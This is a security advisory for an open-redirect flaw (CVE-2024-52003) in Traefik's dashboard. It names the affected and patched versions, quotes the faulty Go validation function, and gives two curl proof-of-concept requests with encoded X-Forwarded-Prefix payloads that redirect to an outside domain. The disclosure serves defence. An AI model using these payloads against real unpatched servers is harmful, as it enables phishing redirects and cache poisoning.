Skip to content

X-Forwarded-Prefix Header allows for Open Redirect

Low
nmengin published GHSA-h924-8g65-j9wg Nov 29, 2024

Package

gomod Traefik (Go)

Affected versions

<= v2.11.13, <= v3.2.0

Patched versions

v2.11.14, v3.2.1

Description

Impact

There is a vulnerability in Traefik that allows the client to provide the X-Forwarded-Prefix header from an untrusted source.

Patches

Workarounds

No workaround.

For more information

If you have any questions or comments about this advisory, please open an issue.

Original Description ### Summary The previously reported open redirect ([GHSA-6qq8-5wq3-86rp](https://github.com/traefik/traefik/security/advisories/GHSA-6qq8-5wq3-86rp)) is not fixed correctly. The safePrefix function can be tricked to return an absolute URL.

Details

The Traefik API dashboard component tries to validate that the value of the header X-Forwarded-Prefix is a site relative path:

http.Redirect(resp, req, safePrefix(req)+"/dashboard/", http.StatusFound)
func safePrefix(req *http.Request) string {
	prefix := req.Header.Get("X-Forwarded-Prefix")
	if prefix == "" {
		return ""
	}

	parse, err := url.Parse(prefix)
	if err != nil {
		return ""
	}

	return parse.Path
}

PoC

An attacker can bypass this by sending the following payload:

curl -v 'http://traefik.localhost' -H 'X-Forwarded-Prefix: %0d//a.com'
[...]
> HTTP/1.1 302 Found
> Location: //a.com/dashboard/

or similar:

curl -v 'http://traefik.localhost' -H 'X-Forwarded-Prefix: %2f%2fa.com'
[...]
> HTTP/1.1 302 Found
> Location: //a.com/dashboard/

Impact

Similar to the previously reported bug. In cache poisoning scenarios this may be exploitable.

Severity

Low

CVE ID

CVE-2024-52003

Weaknesses

No CWEs

Credits